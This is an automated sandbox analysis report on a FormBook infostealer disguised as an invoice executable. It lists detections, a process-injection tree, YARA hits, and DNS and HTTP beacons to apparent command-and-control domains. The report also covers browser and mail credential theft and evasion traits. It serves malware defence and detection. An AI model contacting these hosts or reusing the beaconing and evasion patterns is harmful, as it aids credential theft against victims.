Windows Analysis Report
INVOICE, PACKING LIST, COPY BL.exe

Overview

General Information

Sample name: INVOICE, PACKING LIST, COPY BL.exe
Analysis ID: 1595905
MD5: d99a197ff2ab116a27ebc2f9f5cb9621
SHA1: 3f0432535936a6ba7f8f59165955fd5a80a1fbac
SHA256: a91e52d4bedcc2c8114e3f2ddb80908c4abb92b0838689a14818494009088b95
Tags: exe, user-threatcat_ch
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • INVOICE, PACKING LIST, COPY BL.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe" MD5: D99A197FF2AB116A27EBC2F9F5CB9621)
    • INVOICE, PACKING LIST, COPY BL.exe (PID: 7728 cmdline: "C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe" MD5: D99A197FF2AB116A27EBC2F9F5CB9621)
      • 2zqVCuEmR.exe (PID: 5360 cmdline: "C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\Ecsr5MF5B.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • secinit.exe (PID: 7980 cmdline: "C:\Windows\SysWOW64\secinit.exe" MD5: 3B4B8DB765C75B8024A208AE6915223C)
          • 2zqVCuEmR.exe (PID: 7128 cmdline: "C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\jbvjh2XSnh6aHF.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7352 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.1753952129.0000000003750000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.2643396170.00000000030B0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.1752858443.00000000014E0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.1752372159.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.2643246476.0000000003060000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
3.2.INVOICE, PACKING LIST, COPY BL.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.INVOICE, PACKING LIST, COPY BL.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched
No Suricata rule has matched

                AV Detection

                Source: INVOICE, PACKING LIST, COPY BL.exeAvira: detected
                Source: INVOICE, PACKING LIST, COPY BL.exeReversingLabs: Detection: 47%
                Source: INVOICE, PACKING LIST, COPY BL.exeVirustotal: Detection: 32%Perma Link
                Source: Yara matchFile source: 3.2.INVOICE, PACKING LIST, COPY BL.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.INVOICE, PACKING LIST, COPY BL.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1753952129.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2643396170.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1752858443.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1752372159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2643246476.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2641361851.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2643029007.0000000004E20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2645828359.0000000004D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: INVOICE, PACKING LIST, COPY BL.exeJoe Sandbox ML: detected
                Source: INVOICE, PACKING LIST, COPY BL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: INVOICE, PACKING LIST, COPY BL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: secinit.pdbGCTL source: INVOICE, PACKING LIST, COPY BL.exe, 00000003.00000002.1752656882.0000000001198000.00000004.00000020.00020000.00000000.sdmp, 2zqVCuEmR.exe, 00000005.00000002.2642194522.000000000155E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: INVOICE, PACKING LIST, COPY BL.exe, 00000003.00000002.1752989038.0000000001600000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1752868899.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.2643722597.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.2643722597.0000000003210000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1756481965.0000000003064000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: INVOICE, PACKING LIST, COPY BL.exe, INVOICE, PACKING LIST, COPY BL.exe, 00000003.00000002.1752989038.0000000001600000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, secinit.exe, 00000006.00000003.1752868899.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.2643722597.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.2643722597.0000000003210000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1756481965.0000000003064000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: secinit.pdb source: INVOICE, PACKING LIST, COPY BL.exe, 00000003.00000002.1752656882.0000000001198000.00000004.00000020.00020000.00000000.sdmp, 2zqVCuEmR.exe, 00000005.00000002.2642194522.000000000155E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 2zqVCuEmR.exe, 00000005.00000002.2641515194.0000000000E2F000.00000002.00000001.01000000.0000000C.sdmp, 2zqVCuEmR.exe, 00000007.00000002.2643227394.0000000000E2F000.00000002.00000001.01000000.0000000C.sdmp
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02ADC750 FindFirstFileW,FindNextFileW,FindClose,6_2_02ADC750
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 4x nop then xor eax, eax6_2_02AC9EA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 4x nop then mov ebx, 00000004h6_2_035604E8

                Networking

                Source: DNS query: www.physicsbrain.xyz
                Source: DNS query: www.autonomousrich.xyz
                Source: Joe Sandbox ViewIP Address: 192.64.118.221 192.64.118.221
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /i9o2/?lD28M=8NMLjrEX&o8I=eeVMOLNT7Wv5dPd1V7fF3d7wbVEZ0Ymjpf1j0+DhWbaaRP3NDl28Px2LHOiznaPSxG5Xa8rlCZjeYW1RU+5lmJ9SS7h7GpbOR0Ih6QylNPIlDDPXgKAPXKjWtP8cuJHPWQ== HTTP/1.1Host: www.physicsbrain.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global trafficHTTP traffic detected: GET /s3u9/?o8I=UzjCSVSddvdCY8C2KpgECGgzR3gby2SVeHfhkJM3nHWcSpz3gZ2Mu5mgzC51fDOgl0cc0ISzjbohHF66d8TEsPEdOrzND6qrSzk1cnsXMxQ/Woon90MFrB7EZZ9A9paTig==&lD28M=8NMLjrEX HTTP/1.1Host: www.bydotoparca.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global trafficHTTP traffic detected: GET /sps0/?o8I=XJrqUIwA9BqFEGe4zPJcFFH+FWeIVG8ka5W/N1g8G7k0/aUxIXiyzXPqBkPj84XroFellg4Bg0NpGuCwGUgLHVI0emb0fq3SPjbmnsy01DHgj+3XsA+9UNATNHrkVJu7Rw==&lD28M=8NMLjrEX HTTP/1.1Host: www.car-select.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global trafficHTTP traffic detected: GET /g9qz/?o8I=J9sRrZ4fqsb/1Q6AIA+8pauKL/kc/YnlctC80LIvBLslcKLdVtpBX2y3nBvKVl1xysCjrJ6Q3kV9G4g20t4jVg6G/hudG0nqqZ6hYWzTP4BH7K0jhDAwFujk6Ut9TYQuCA==&lD28M=8NMLjrEX HTTP/1.1Host: www.topked.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global trafficHTTP traffic detected: GET /5l58/?lD28M=8NMLjrEX&o8I=mzKLqUgWNSOc0HClXj1DYw25iXyF4NDDzKLO7iktqSi1e8VIoGhrLQ80YJoT2UJy6ZdaxC2wU3x58VDwsjwy75MJV3VtnNq0OSNjen8RmThW2Bit8HxG0xB8ZqPFXeAi4g== HTTP/1.1Host: www.autonomousrich.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global trafficHTTP traffic detected: GET /eee1/?o8I=n9kO9VSsPKocZxga8wMP7ZC/yNhYo/MYHbvIjRRvOevNyFmmshV66n7ll9r5u+VXxmlOglvHHE9+Zbjf/X+X+gqcpnFv5fdVnQSXxkRXfk4Q5CwHoK9c2oYwmaFtGgt8pA==&lD28M=8NMLjrEX HTTP/1.1Host: www.corellia.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global trafficDNS traffic detected: DNS query: www.physicsbrain.xyz
                Source: global trafficDNS traffic detected: DNS query: www.bydotoparca.net
                Source: global trafficDNS traffic detected: DNS query: www.car-select.online
                Source: global trafficDNS traffic detected: DNS query: www.topked.top
                Source: global trafficDNS traffic detected: DNS query: www.autonomousrich.xyz
                Source: global trafficDNS traffic detected: DNS query: www.corellia.pro
                Source: unknownHTTP traffic detected: POST /s3u9/ HTTP/1.1Host: www.bydotoparca.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-USOrigin: http://www.bydotoparca.netCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 204Connection: closeReferer: http://www.bydotoparca.net/s3u9/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 21 Jan 2025 12:26:13 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2025-01-21T12:26:18.7550837Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Jan 2025 12:26:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Jan 2025 12:26:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Jan 2025 12:26:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Jan 2025 12:26:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-Encoding
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 12:26:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 12:26:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 12:26:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 12:26:41 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 21 Jan 2025 12:27:01 GMTServer: ApacheContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 21 Jan 2025 12:27:03 GMTServer: ApacheContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 21 Jan 2025 12:27:07 GMTServer: ApacheContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 837Connection: closeDate: Tue, 21 Jan 2025 12:27:09 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 4c 65 20 66 69 63 68 69 65 72 20 72 65 71 75 69 73 20 6e 27 61 20 70 61 73 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 74 72 6f 75 76 26 65 61 63 75 74 65 3b 2e 0a 49 6c 20 70 65 75 74 20 73 27 61 67 69 72 
20 64 27 75 6e 65 20 65 72 72 65 75 72 20 74 65 63 68 6e 69 71 75 65 2e 20 56 65 75 69 6c 6c 65 7a 20 72 26 65 61 63 75 74 65 3b 65 73 73 61 79 65 72 20 75 6c 74 26 65 61 63 75 74 65 3b 72 69 65 75 72 65 6d 65 6e 74 2e 20 53 69 20 76 6f 75 73 20 6e 65 20 70 6f 75 76 65 7a 20 70 61 73 20 61 63 63 26 65 61 63 75 74 65 3b 64 65 72 20 61 75 20 66 69 63 68 69 65 72 20 61 70 72 26 65 67 72 61 76 65 3b 73 20 70 6c 75 73 69 65 75 72 73 20 74 65 6e 74 61 74 69 76 65 73 2c 20 63 65 6c 61 20 73 69 67 6e 69 66 69 65 20 71 75 27 69 6c 20 61 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 73 75 70 70 72 69 6d 26 65 61 63 75 74 65 3b 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta c
                Source: 2zqVCuEmR.exe, 00000007.00000002.2645828359.0000000004D8C000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.corellia.pro
                Source: 2zqVCuEmR.exe, 00000007.00000002.2645828359.0000000004D8C000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.corellia.pro/eee1/
                Source: secinit.exe, 00000006.00000003.1948300259.0000000007BC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: secinit.exe, 00000006.00000003.1948300259.0000000007BC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: secinit.exe, 00000006.00000003.1948300259.0000000007BC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: secinit.exe, 00000006.00000003.1948300259.0000000007BC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: secinit.exe, 00000006.00000003.1948300259.0000000007BC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: secinit.exe, 00000006.00000003.1948300259.0000000007BC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: secinit.exe, 00000006.00000003.1948300259.0000000007BC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: secinit.exe, 00000006.00000002.2641601175.0000000002CEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: secinit.exe, 00000006.00000002.2641601175.0000000002CEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: secinit.exe, 00000006.00000003.1943079432.0000000007AFA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: secinit.exe, 00000006.00000002.2641601175.0000000002CC2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf
                Source: secinit.exe, 00000006.00000002.2641601175.0000000002CEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: secinit.exe, 00000006.00000002.2641601175.0000000002CC2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: secinit.exe, 00000006.00000002.2641601175.0000000002CC2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: secinit.exe, 00000006.00000002.2641601175.0000000002CEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: secinit.exe, 00000006.00000002.2641601175.0000000002CEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: secinit.exe, 00000006.00000003.1948300259.0000000007BC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
                Source: secinit.exe, 00000006.00000003.1948300259.0000000007BC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                Source: Yara match File source: 3.2.INVOICE, PACKING LIST, COPY BL.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 3.2.INVOICE, PACKING LIST, COPY BL.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000003.00000002.1753952129.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.2643396170.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.1752858443.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.1752372159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.2643246476.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.2641361851.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.2643029007.0000000004E20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.2645828359.0000000004D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sample Static PE information: Filename: INVOICE, PACKING LIST, COPY BL.exe
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_0042CB93 NtClose,3_2_0042CB93
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672B60 NtClose,LdrInitializeThunk,3_2_01672B60
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01672DF0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01672C70
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_016735C0 NtCreateMutant,LdrInitializeThunk,3_2_016735C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01674340 NtSetContextThread,3_2_01674340
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01674650 NtSuspendThread,3_2_01674650
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672BE0 NtQueryValueKey,3_2_01672BE0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672BF0 NtAllocateVirtualMemory,3_2_01672BF0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672BA0 NtEnumerateValueKey,3_2_01672BA0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672B80 NtQueryInformationFile,3_2_01672B80
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672AF0 NtWriteFile,3_2_01672AF0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672AD0 NtReadFile,3_2_01672AD0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672AB0 NtWaitForSingleObject,3_2_01672AB0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672D30 NtUnmapViewOfSection,3_2_01672D30
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672D00 NtSetInformationFile,3_2_01672D00
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672D10 NtMapViewOfSection,3_2_01672D10
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672DD0 NtDelayExecution,3_2_01672DD0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672DB0 NtEnumerateKey,3_2_01672DB0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672C60 NtCreateKey,3_2_01672C60
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672C00 NtQueryInformationProcess,3_2_01672C00
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672CF0 NtOpenProcess,3_2_01672CF0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672CC0 NtQueryVirtualMemory,3_2_01672CC0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672CA0 NtQueryInformationToken,3_2_01672CA0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672F60 NtCreateProcessEx,3_2_01672F60
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Code function: 3_2_01672F30 NtCreateSection,3_2_01672F30
